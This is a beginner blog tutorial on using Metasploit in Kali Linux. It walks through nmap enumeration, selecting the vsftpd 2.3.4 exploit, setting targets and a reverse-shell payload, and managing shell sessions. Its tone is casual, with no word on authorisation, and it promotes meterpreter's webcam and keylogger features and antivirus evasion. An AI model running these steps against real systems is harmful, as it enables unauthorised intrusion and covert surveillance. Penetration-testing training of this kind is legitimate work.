How to use Metasploit | Learn to tame the beast of hacking
metasploit
metasploit

By the end of this article, you will walk out with a working understanding of Metasploit. Your hands will be dying to try the tool and your head will be buried in your computer. We suggest you pause reading and grab a paper and a pen to jot down the important bits, pun not intended, and also write any questions that you have, which you can later comment below for us to answer.

KNOW THY BEAST

The Metasploit Project is a pentest project that you can use to find and exploit vulnerabilities. That’s about it. Oh and it’s Ruby based and is quite a favourite among pentesters and security analysts.
Oh and it also comes with pre-built scripts which make hacking so so simple.

And, and, and, it also has more than 1900 different kinds of exploits that don’t really care which operating system is at target, which means that you could exploit literally anything. Websites, IoT, networks, hosts, hardware, software, you name it!

WHAT CAN IT DO?

More like what can’t it do?
Metasploit can:

  • Enumerate networks
  • Execute attacks
  • Identify security bugs
  • Mitigate vulnerabilities
  • Manage security assessments
  • Evade detection

DO YOU HAVE WHAT IT TAKES?

Minimum System Requirements:

  • 2 GHz Processor
  • 4 GB RAM
  • 1 GB Disk space

Supported Operating Systems:

  • Windows Server 2008 and later
  • Windows 8 and later
  • Red Hat Enterprise Linux 5.10 and later
  • Ubuntu Linux 14.04 and later

 

1, 2, 3, DOWNLOAD

Oh wait. No need to download. Kali has it pre-installed!

(If you want to know how to get started with Kali, go here.)

LET’S OPEN IT, THEN!

open metasploit in kali linux

Okay. This is how it should look now:

1st look of metasploit

Now, write these 3 commands:

1. Start the postgresql service: service postgresql start
2. And check its status: systemctl status postgresql.service

commands of metasploit

3. Create and initialise msf database: msfdb init

create msf database

CONGRATULATIONS!

You are ready to use it. 🙂

how to start metasploit

Wait, what are these numbers at the bottom. Let’s look at them, shall we?

  • Metasploit v5.0.37-dev: is obviously the version of Metasploit (didn’t need to tell this but too late now)
  • 1915 exploits : Are you fu**ing kidding me? No. We warned you earlier. It has a lot of exploits. It’s Metasploit, man!
  • 545 payloads : After you use the exploit to get in, you drop the payload. Payloads are the malicious executable code that are sent to infect the system.
  • 1074 auxiliary : Apart from 1915 exploit modules, you have 1074 auxiliary modules (which don’t have payloads cause they are not used for exploitation). Use them to a variety of other things like making port scanners, vulnerability scanners etc.
  • 329 post : Once you breach into your target, you could escalate your privileges, get your hands on some evidence or do other shady stuff using these post exploitation modules.
  • 44 encoders : These encoders ensure that your payloads sneak into the target without getting caught, by encoding them.
  • 10 nops: Made to maintain the consistency of your payload size.
  • 2 evasion: Use these to create payloads that can’t be detected and laugh at the target’s anti-virus.

Okay, last but not the least. Type help to see the endless things (along with the commands) you can do on this beast.

help command on metasploit
kali linux metasploit
kali linux metasploit
how to use metasploit

OK, LET’S BEGIN!
1. Check the database status to make sure you are connected and everything is in place. Command: db_status

db status command
2. Create a new workspace. Workspaces help you stay organized.
 Use these following commands:
workspace in metasploit

a. For new workspace: workspace -a name_of_workspace

new workspace command in metasploit

b. For deleting a workspace: workspace -d name_of_workspace
c. To get help about other workspace commands: workspace -h

3. Start enumeration:
In this post, you’ll be hacking into a Linux Virtual Machine.

Step 1: Command for nmap scan: db_nmap -A ip_to_scan
(Metasploit supports nmap scan, thanks to database!)
You’ll now see that the host is added to the database.
Command to see all hosts: hosts

how to see hosts in metasploit

Step 2: Command to see all services: services

services command

Can you see vsftpd 2.3.4?

Step 3: Command to see the exploits you have for this: search exploit_name
You can also see ALL exploits you have through: show exploits

how to use metasploit

Voila! We found one!

SHALL WE EXPLOIT?

Step 1: Select the exploit: use exploit_name

selecting exploits

Step 2: See what YOU need to input (also called options here).
Command: Figure this one out yourself from the image below.

options

You’ll see that RHOSTS (i.e. Remote Hosts) are needed.
Note:
RHOSTS mean Remote Hosts: The IP of your target
RPORT mean Remote Port: The port of your target
Do you know what LHOST and LPORT mean? Comment below to take a guess.

Step 3: Set RHOSTS

Command: set RHOSTS ip_of_target
In case you want to get them from the database, you can use the command: hosts -S Linux -R
The above command has two parts:
-S: S as in Operating System. We have used -S Linux to find all the devices that are Linux based.
-R: We use this to attach the above found devices in the RSHOSTS.
Keeping up?

set RHOSTS

STEP 4: Check your targets: show targets

In case you see multiple targets, set them using this command:set target 0/1/2

Step 5: An exploit has to have a payload.
To see payloads for this exploit: show payloads

show payloads

Set this payload using the command in the image below. And once again, check your options.

setting up payload

Can you see the payload options now?
Note: You could even be prompted to set LHOST and LPORT (but it varies from payload to payload).

ALMOST THERE
1. Command to exploit: exploit

command to exploit

If all goes well, your payload will reach where it’s meant to and do it’s work and present you with a shell.

2. To put the shell in the background: background

You can carry out post exploits on the shell later. Can you recall how many post exploits Metasploit has?

Did you know: There are payloads in Metasploit that lead you to an awesome shell- meterpreter. Why is it awesome? It includes some savage commands (for webcam access, keylogger and other supercool stuff)
You could use this payload for instance: windows/meterpreter/reverse_tcp
Fun task for you: Try this on a target and and use all the commands. And tell us in the comments below which one’s your favourite.

3. To see all active sessions: sessions

how to see all active sessions metasploit

Last but not the least,
Use this command to interact with a session: sessions -i session_id

Pro tip: Keep your beast updated!
Command: root:/# apt update; apt install metasploit-framework

We are confident that now you can use this ultimate hacking tool at your disposal to break into vulnerabilities and drop payloads and also do some other awesome stuff. We encourage you to ask questions in the comments below. You can also join our forum to connect with people and get your hacking queries cleared.

Read more. Know more. Grow more.

Learn cybersecurity inside out

0 Comments

Leave a reply

Your email address will not be published. Required fields are marked *

*

©2020 Tech Brewery. All Rights Reserved. Website By Amagraphs.

Log in with your credentials

or    

Forgot your details?

Create Account